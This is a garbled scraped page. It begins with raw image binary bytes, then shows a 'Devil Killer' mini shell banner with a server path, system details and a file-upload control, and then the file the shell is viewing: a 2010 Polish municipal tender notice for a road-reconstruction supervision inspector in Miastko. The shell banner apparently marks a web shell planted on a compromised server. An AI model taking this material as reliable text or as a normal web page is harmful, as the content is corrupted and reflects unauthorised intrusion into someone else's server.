JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100421/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100421/112704-N-2010.html

<p class="kh_header"><b>Miastko: Pełnienie funkcji Inspektora nadzoru realizacji projektu pn: Przebudowa ul. Konopnickiej w Miastku gm. Miastko, pow. bytowski, woj. pomorskie</b><br>
<b>Numer ogłoszenia: 112704 - 2010; data zamieszczenia: 21.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miastko , ul. Grunwaldzka 1, 77-200 Miastko, woj. pomorskie, tel. 059 8572081, faks 059 8572368.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miastko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inspektora nadzoru realizacji projektu pn: Przebudowa ul. Konopnickiej w Miastku gm. Miastko, pow. bytowski, woj. pomorskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi polegającej na pełnieniu funkcji Inspektora nadzoru w  zakresie zarządzania, kontrolowania, nadzorowania i rozliczania realizacji projektu pn.: Przebudowa ul. Konopnickiej w Miastku  obejmującego wykonanie następującego zakresu rzeczowego: 
1)	przebudowę drogi gminnej ul. Konopnickiej  o nawierzchni bitumicznej  w km 0+000 - 0+202,53 o szerokości 6,00 m wraz z zjazdami  i skrzyżowaniami z drogami gminnymi 
2)	przebudowę ul. Marszałka Piłsudskiego w km 0+000 - 0+102,63 o szer. 6,00 m  wraz z zjazdami  i skrzyżowaniami z drogami gminnymi
3)	przebudowę budowę drogi nr 2  w km. 0+000 - 0+ 136,05  o szer. 3,0m wraz z zjazdami  i skrzyżowaniami z drogami gminnymi
4)	przebudowę lub  budowę chodników ( nawierzchnia z kostki polbruk gr. 6 cm) o szerokości  2,00m wzdłuż ul. Konopnickiej , Marszałka Piłsudskiego i częściowo wzdłuż drogi nr 2
5)	wykonanie miejsc postojowych i placów utwardzonych wzdłuż w/w ulic ( nawierzchnia z kostki polbruk  gr. 8 cm)
6)	umocnienie skarp płytami ażurowymi
7)	przebudowę  schodów terenowych
8)	przesunięcie  kilku lamp oświetleniowych 
9)	rozbiórkę istniejącego i wybudowanie nowej części ogrodzenia kolidującego  z planowaną inwestycją 

10)	wycinkę drzew i krzewów kolidujących z inwestycją
11)	wykonanie oznakowania  pionowego i poziomego w zakresie budowanej drogi. 
12)	budowę kanalizacji deszczowej rur dwuściennych PP
- o średnicy D=200mm L = 137,50m 
- o średnicy D= 250mm L = 38,00 m
- o średnicy D = 315mm L = 188,00m
- o średnicy D= 400mm L = 124,50 m
- oraz o średnicy D= 600 mm L = 3,70 m z rur PE HD
- studzienki rewizyjne betonowe O 1200 - szt. 21 
- studnie ściekowe DN 500 mm - szt. 23
 wraz z robotami towarzyszącymi i tymczasowymi
Zakres rzeczowy przedmiotu zamówienia:
1. Zapoznanie się z całą dokumentacją formalną-prawną jaka obowiązuje strony - odpowiednio;         Zamawiającego, Inspektora nadzoru, Wykonawcę robót,  od początku realizacji inwestycji do przyjęcia rozliczenia końcowego bez zastrzeżeń przez Zamawiającego.
   Dokumentacja formalno-prawna  składa się z :
1)	dokumentacji projektowej obejmującej wykonanie robót budowlanych wymienionych  w poz. 2.1.siwz; tj.
a)	 Projektu budowlano - wykonawczy branży drogowej : Przebudowa dróg gminnych                     ( ul. Długa,   M. Konopnickiej, Marszałka Piłsudskiego) i budowa nowego odcinka drogi gminnej łączącego ul. Marii Konopnickiej z ul. M. Piłsudskiego wraz z przebudową i budową kanalizacji deszczowej , budową miejsc postojowych i placów utwardzonych, chodników dla pieszych schodów terenowych i murków oporowych w Miastku;
b)Projekt budowlano - wykonawczy  branży sanitarnej: Przebudowa dróg gminnych                            ( ul. Długa, M. Konopnickiej, Marszałka Piłsudskiego) i budowa nowego odcinka drogi gminnej łączącego ul. Marii Konopnickiej z ul. M. Piłsudskiego wraz z przebudową i budową kanalizacji deszczowej , budową miejsc postojowych i placów utwardzonych, chodników dla pieszych schodów terenowych i murków oporowych w Miastku;
c)Projekt stałej organizacji ruchu dla inwestycji polegającej na przebudowie dróg gminnych                                 ( ul. Długa, M. Konopnickiej, Marszałka Piłsudskiego) i budowie nowego odcinka drogi gminnej łączącego ul. Marii Konopnickiej z ul. M. Piłsudskiego wraz z przebudową i budową kanalizacji deszczowej , budową miejsc postojowych i placów utwardzonych, chodników dla pieszych schodów terenowych i murków oporowych w Miastku.
d) Specyfikacji technicznych wykonania i odbioru robót: branży drogowej, sanitarnej
2)	inne dokumenty, które są obowiązujące na podstawie ww. wymienionych dokumentów oraz  jakie powstaną w wyniku przeprowadzenia postępowań ws. udzielenia zamówienia wykonawcy robót budowlanych ( dokumentacja przetargowa, najkorzystniejsza oferta, umowa z wykonawcą robót),
2. Udział w posiedzeniu komisji przetargowej w roli doradcy w kwestiach technicznych  postępowania o  udzielenie zamówienia na roboty budowlane,
3. Zgłaszanie ewentualnych uwag (wniosków) w odniesieniu do treści dokumentacji projektowych,
4. Organizacja i udział w przekazaniu terenu budowy Wykonawcy - w tym sporządzenie stosownego
protokołu,
5. Organizowanie i prowadzenie narad koordynacyjnych - nie mniej niż jeden raz na trzy tygodnie, a w zależności od potrzeb częściej zgodnie z żądaniem Zamawiającego,
6. Wykonywanie czynności inspektora nadzoru w branży drogowej i sanitarnej zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (t.j. Dz.U. z 2003r. Nr 207, poz. 2016 z  późn. zm.),
7. Kontrola  zgodności realizacji robót budowlanych  z  dokumentacją projektową, specyfikacją istotnych warunków zamówienia, specyfikacjami technicznymi wykonania i odbioru robót budowlanych, treścią oferty Wykonawcy i  zawartą z nim umową,
8. Koordynacja realizacji robót w celu zachowania ich postępu zgodnie z harmonogramem rzeczowo-finansowym,
9. Weryfikowanie, aktualizowanie i sporządzanie  harmonogramów rzeczowo-finansowych w zależności od potrzeb,
10. Zgłaszanie Zamawiającemu w razie potrzeby konieczności wykonania robót dodatkowych, zamiennych -  sporządzanie na tę okoliczność protokołów konieczności (robót zamiennych) i przedkładanie ich Zamawiającemu do akceptacji przed realizacją tych robót,
11. Ewidencjonowanie kosztów inwestycji i ich rozliczanie z Zamawiającym w okresach miesięcznych,
12. Przygotowanie i przedstawianie comiesięcznych sprawozdań z postępu robót i realizacji wydatków zaplanowanych nakładów finansowych na realizację zadania,
13. Sporządzanie i przekazywanie Zamawiającemu niezbędnych dokumentów do uruchamiania finansowania inwestycji ,
14. Sprawdzanie szczegółowych kalkulacji, kosztorysów powykonawczych, faktur wraz z załączonymi dokumentami przedstawionych przez wykonawców, dostawców i usługobiorców oraz uzgadnianie wydatków i kosztów realizowanej inwestycji,
15. Spowodowanie , w razie potrzeby, naniesienia zmian w dokumentacji projektowej i przekazanie Zamawiającemu dokumentacji powykonawczej,
16. Przygotowanie i dokonywanie odbiorów robót ulegających zakryciu, zanikowych, odbiorów częściowych robót oraz odbioru końcowego zgodnie z warunkami określonymi w umowie z Wykonawcą robót i w innych dokumentach kontraktu, 
17. Dokonywanie w uzgodnieniu z Zamawiającym zmian wynikłych w trakcie realizacji robót,
18. Sporządzanie opinii dotyczących wad przedmiotu umowy, uznanych za nie nadających się do ich usunięcia oraz wnioskowanie o obniżenie wynagrodzenia wykonawcom z określeniem i utraty wartości robót i kwot obniżonego wynagrodzenia za te roboty,
19. Zawiadamianie Zamawiającego i Wykonawcę o stwierdzonych wadach w jego robotach w okresie rękojmi,
20. Sporządzanie wniosków o zapłatę kar umownych za zwłokę Wykonawcy w realizacji inwestycji oraz za zwłokę w usunięciu usterek stwierdzonych przy odbiorze robót,
21. Sporządzenie i dostarczenie Zamawiającemu ostatecznego rozliczenia zrealizowanej i odebranej inwestycji  w tym operatu odbiorczego wraz z protokołem OT/przyjęcia środka trwałego w terminie do 10 grudnia  2010r. tj  w ciągu 10 dni licząc od terminu odbioru końcowego inwestycji planowanego na dzień 30 listopada 2010r. - rozumianego jako datę podpisania przez Zamawiającego protokołu końcowego odbioru zamówienia (robót) po zrealizowaniu całego zakresu rzeczowego,
22. Zgłoszenie zrealizowanej inwestycji do użytkowania , przygotowanie dokumentacji i wniosku o decyzję na użytkowanie,
23. Uczestniczenie w czynnościach kontrolnych sprawowanych przez organ nadzoru budowlanego i jednostek   sprawujących funkcje kontrolne dotyczące projektu,
24. Udział w pracach komisji związanych z przeglądami gwarancyjnymi,
25. Udział w przeglądach pogwarancyjnych i sporządzanie protokołów pogwarancyjnych,
26. Spowodowanie zastępczego usunięcia w okresie rękojmi wad i usterek na koszt Wykonawcy,

Warunki realizacji (wykonania) przedmiotu zamówienia
1. Obowiązujące dokumenty kontraktowe - wymienione w poz. II.1. niniejszego ogłoszenia
2. Inspektor nadzoru  zobowiązany jest pełnić swoją funkcję zgodnie z wymaganiami wynikającymi z dokumentów kontraktowych i  obowiązujących przepisów odnoszących się do przedmiotu zamówienia w zakresie realizacji robót budowlanych, stosowania materiałów i urządzeń, sprawowania nadzoru (funkcji inspektora nadzoru) w branży drogowej i  sanitrnej,  zawartych m.in. w  ustawie z dnia 7 lipca 1994 r. - Prawo budowlane (t.j. Dz.U. z 2003r. Nr207, poz. 2016 z  późn. zm.) i innych,
3. Inspektor nadzoru zobowiązany jest do obecności na terenie budowy na każde żądanie Zamawiającego w sytuacji, w której  jego nieobecność grozi Zamawiającemu poniesieniem szkody, lub innymi sankcjami związanymi z przebiegiem realizacji robót. W takim przypadku przybycie musi nastąpić w dniu  zgłoszenia takiej konieczności,
4. Częstotliwość inspekcji robót musi zabezpieczać jakość ich wykonania i umożliwiać Wykonawcy postęp robót zgodnie z przyjętym harmonogramem.  W przypadku prowadzenia robót w strefach podwyższonego zagrożenia obecność Inspektora nadzoru  powinna być adekwatna do stopnia ewentualnego zagrożenia,
5. Inspektor nadzoru zobowiązany jest do reagowania na bieżąco z natychmiastowym zawiadamianiem Zamawiającego o zagrożeniach terminów realizacyjnych przyjętych w harmonogramie,
6. Wszelkie polecenia, decyzje, uwagi muszą być bezwzględnie wydawane na piśmie (wpisem w dzienniku budowy),
7. W przypadku nie wywiązywania się określonych osób z nałożonych obowiązków dotyczących sprawowania nadzoru (funkcji inspektora nadzoru), a także w przypadku złej współpracy z  Zamawiającym i Wykonawcą, Zamawiający  jest uprawniony  do żądania zmiany osoby, której to dotyczy a Inspektor nadzoru to żądanie musi spełnić; w razie odmowy spełnienia takiego żądania, Zamawiający po określonej na piśmie dacie wzywającej do zaprzestania sprawowania  nadzoru inwestorskiego ( dla danej branży) jest uprawniony do wyznaczenia takiej osoby we własnym zakresie, a wynagrodzenie brutto przysługujące tej osobie będzie potrącane z faktur wystawianych przez Inspektora nadzoru za świadczenie jego usługi,   
8. Jeżeli z  przyczyn nie nazwanych na etapie prowadzonego postępowania termin ostatecznego finansowego rozliczenia projektu ulegnie przedłużeniu to fakt ten nie zwalnia Inspektora nadzoru z  obowiązku  ostatecznego finansowego rozliczenia projektu pod rygorem odmowy określonej części wynagrodzenia, równoważnej wysokości wynagrodzenia za zlecenie  dokonania przedmiotowego rozliczenia osobom trzecim, 
9. Zagwarantowanie przedłużenia obowiązku wykonywania czynności określonych w poz. 24. do poz. 26 na okres objęty gwarancją udzieloną przez  wykonawcę  robót budowlanych, bez dodatkowego wynagrodzenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>do 50% wartości zamówienia podstawowego - w przypadku realizacji robót budowlanych II i III etapu przebudowy ul. Konopnickiej w Miastku</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.54.10.00-2, 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Na podstawie art. 45 ust. 2 Pzp Zamawiający żąda od Wykonawców ubiegających się o udzielenie zamówienia wniesienia wadium w kwocie 1.000,00 PLN (słownie: jeden tysiąc  złotych 00/100). 
Wykonawca ubiegający się o udzielenie zamówienia zobowiązany jest do wniesienia wadium przed upływem terminu składania ofert tj. do dnia 29 kwietnia  2010r. do godz. 12:00. 
Wadium może być wnoszone w jednej lub kilku następujących formach: 
1) w pieniądzu; 
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy musi być poręczeniem pieniężnym; 
3) gwarancjach bankowych; 
4) gwarancjach ubezpieczeniowych; 
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.). 
Wadium wnoszone w pieniądzu musi być wpłacone przelewem na rachunek bankowy Zamawiającego - PKO BP O/Miastko, nr 97 1020 4708 0000 7102 0004 4362. Wniesione w ten sposób wadium będzie skuteczne, jeżeli w podanym terminie tj. do dnia 29 kwietnia 2010r. do godz. 12:00. znajdzie się na rachunku bankowym Zamawiającego. W przeciwnym przypadku wykonawca zostanie wykluczony z postępowania. Dlatego też należy dochować należytej staranności, aby nie dopuścić do uchybienia wskazanego terminu. Uwaga: Niedopuszczalna jest forma gotówkowej wpłaty w kasie Urzędu Miejskiego w Miastku..</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przepisy prawa nie nakładają obowiązku posiadania uprawnień ( koncesji, zezwolenia, licencji) do wykonywania działalności gospodarczej w zakresie upoważniających wykonawcę do ubiegania się o udzielenie i realizację zamówienia będącego przedmiotem niniejszego  postanowienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia tego warunku wykonawcy zobowiązani są do wykazania, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali ( zakończyli) jako inspektor nadzoru ( inżynier kontraktu)  nie mniej niż jedną usługę polegającą na zarządzaniu, kontrolowaniu, nadzorowaniu i rozliczaniu budowy lub przebudowy dróg utwardzonych 
Ocena spełnienia wymaganego warunku zostanie przeprowadzona zgodnie z formułą spełnia/ nie spełnia w oparciu o informacje zawarte w dokumentach lub oświadczeniach wyszczególnionych w  siwz i odpowiednio w ogłoszeniu, które wykonawcy zobowiązani są złożyć wraz z ofertą w celu potwierdzenia spełnienia tego warunku. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia stosownie do art. 23 ustawy Pzp ( np. na podstawie umowy konsorcjalnej) opisany warunek powinni spełniać wspólnie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunku wykonawcy zobowiązani są do wykazania dysponowania środkiem transportu , który będzie pozostawał do dyspozycji osób przewidzianych do realizacji zamówienia w ilości - 1 szt 

Ocena spełnienia wymaganego warunku zostanie przeprowadzona zgodnie z formułą spełnia/ nie spełnia w oparciu o informacje zawarte w dokumentach lub oświadczeniach wyszczególnionych w  siwz i odpowiednio w ogłoszeniu, które wykonawcy zobowiązani są złożyć wraz z ofertą w celu potwierdzenia spełnienia tego warunku. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia stosownie do art. 23 ustawy Pzp ( np. na podstawie umowy konsorcjalnej) opisany warunek powinni spełniać wspólnie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunku wykonawcy zobowiązani są do wykazania dysponowania następującymi  osobami :
1)	osobą przewidzianą do zarządzania, kontrolowania, nadzorowania robót w zakresie branży drogowej posiadającą odpowiednie dla tego zadania uprawnienia budowlane o specjalności drogowej, będącą członkiem Okręgowej Izby Inżynierów Budownictwa zgodnie z ustawą z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów, 
lub posiadającą stosowne uprawnienia upoważniające ją do pełnienia ww. funkcji na terenie Polski w przypadku osoby z kraju członkowskiego Unii Europejskiej,-  legitymującymi się nie mniejszym niż 3 letnim stażem zawodowym, 
2)	osobą przewidzianą do zarządzania, kontrolowania, nadzorowania robót w zakresie branży sanitarnej- posiadającą odpowiednie uprawnienia budowlane w tym zakresie o specjalności sanitarnej, będącą członkiem Okręgowej Izby Inżynierów Budownictwa zgodnie z ustawą z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów, 
   lub posiadającą stosowne uprawnienia upoważniające ją do pełnienia ww. funkcji na terenie Polski w przypadku osoby z kraju członkowskiego Unii Europejskiej,-  legitymującymi się nie mniejszym niż 3 letnim stażem zawodowym;
          3) osobą przewidzianą do obsługi finansowo-rzeczowej, sprawozdawczo-rozliczeniowej projektu legitymującą się 3 letnim stażem zawodowym w tym zakresie odnoszącym się do obsługi  inwestycji jak przedmiot zamówienia, odnosi się to również do osób z kraju członkowskiego Unii Europejskiej;
Ocena spełnienia wymaganego warunku zostanie przeprowadzona zgodnie z formułą spełnia/ nie spełnia w oparciu o informacje zawarte w dokumentach lub oświadczeniach wyszczególnionych w  siwz i odpowiednio w ogłoszeniu, które wykonawcy zobowiązani są złożyć wraz z ofertą w celu potwierdzenia spełnienia tego warunku. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia stosownie do art. 23 ustawy Pzp ( np. na podstawie umowy konsorcjalnej) opisany warunek powinni spełniać wspólnie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunków wykonawcy zobowiązani są do wykazania, że posiadają lub dysponują środkami finansowymi w kwocie nie mniejszej niż 10.000 PLN (słownie: dziesięć tysięcy złotych)
Ocena spełnienia wymaganego warunku zostanie przeprowadzona zgodnie z formułą spełnia/ nie spełnia w oparciu o informacje zawarte w dokumentach lub oświadczeniach wyszczególnionych w  siwz i odpowiednio w ogłoszeniu, które wykonawcy zobowiązani są złożyć wraz z ofertą w celu potwierdzenia spełnienia tego warunku. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia stosownie do art. 23 ustawy Pzp ( np. na podstawie umowy konsorcjalnej) opisany warunek powinni spełniać wspólnie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

